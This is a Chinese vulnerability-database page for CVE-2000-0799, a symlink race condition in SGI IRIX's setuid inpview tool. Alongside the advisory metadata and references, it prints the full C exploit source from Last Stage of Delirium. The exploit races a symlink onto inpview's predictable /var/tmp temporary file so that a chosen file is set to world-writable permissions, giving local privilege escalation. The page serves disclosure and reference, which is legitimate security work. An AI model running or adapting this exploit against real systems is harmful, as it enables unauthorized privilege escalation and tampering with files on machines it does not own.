IRIX inpview竞争条件漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105671 漏洞类型 竞争条件
发布时间 2000-01-01 更新时间 2007-07-14
CVE编号 CVE-2000-0799 CNNVD-ID CNNVD-200010-105
漏洞平台 IRIX CVSS评分 3.7
|漏洞来源
https://www.exploit-db.com/exploits/20130
https://www.securityfocus.com/bid/1530
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-105
|漏洞详情
SGIIRIX5.3版本到IRIX6.5.10版本中InPerson的inpview存在漏洞。本地用户可以借助对.ilmpAAA暂时文件的符号连接攻击来提升特权。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/1530/info

Certain versions of IRIX ship with a version of inpview that creates files in '/var/tmp/' in an insecure manner and is therefore prone to a race condition.

InPerson's 'inpview' is a networked multimedia conferencing tool. InPerson provides multiway audio and video conferencing with a shared whiteboard, combined into a single, easy-to-use application. You use a separate "phone" tool to place and answer calls.

The 'inpview' program writes out temporary files in the '/var/tmp' directory. Because these filenames are not random, an attacker can create a symlink to a previously created filename and force the SUID 'inpview' to overwrite the file with 'rw-rw-rw' permissions. 
*/

/*## copyright LAST STAGE OF DELIRIUM jan 2000 poland        *://lsd-pl.net/ #*/
/*## /usr/lib/InPerson/inpview                                               #*/

/*   sets rw-rw-rw permissions                                                */

#include <sys/types.h>
#include <dirent.h>
#include <stdio.h>

main(int argc,char **argv){
    DIR *dirp;struct dirent *dentp;

    printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland  //lsd-pl.net/\n");
    printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n");

    if(argc!=2){
        printf("usage: %s file\n",argv[0]);
        exit(-1);
    }

    if(!fork()){
        nice(-20);sleep(2);close(0);close(1);close(2);
        execle("/usr/lib/InPerson/inpview","lsd",0,0);
    }

    printf("looking for temporary file... ");fflush(stdout);
    chdir("/var/tmp");
    dirp=opendir(".");
    while(1){
        if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;}
        if(!strncmp(dentp->d_name,".ilmpAAA",8)) break; 
    }
    closedir(dirp);
    printf("found!\n");
    while(1){
        if(!symlink(argv[1],dentp->d_name)) break;
    }
    sleep(2);
    unlink(dentp->d_name);

    execl("/bin/ls","ls","-l",argv[1],0);
}
|受影响的产品
SGI IRIX 6.5.8 SGI IRIX 6.5.7 SGI IRIX 6.5.6 SGI IRIX 6.5.4 SGI IRIX 6.5.3 m SGI IRIX 6.5.3 f SGI IRIX 6.5.3 SGI IRIX 6.5.2 m
|参考资料

来源:BUGTRAQ
名称:20000802[LSD]someunpublishedLSDexploitcodes
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558@ix.put.poznan.pl
来源:BID
名称:1530
链接:http://www.securityfocus.com/bid/1530
来源:XF
名称:irix-inpview-symlink(5065)
链接:http://xforce.iss.net/static/5065.php
来源:SGI
名称:20001101-01-I
链接:ftp://patches.sgi.com/support/free/security/advisories/20001101-01-I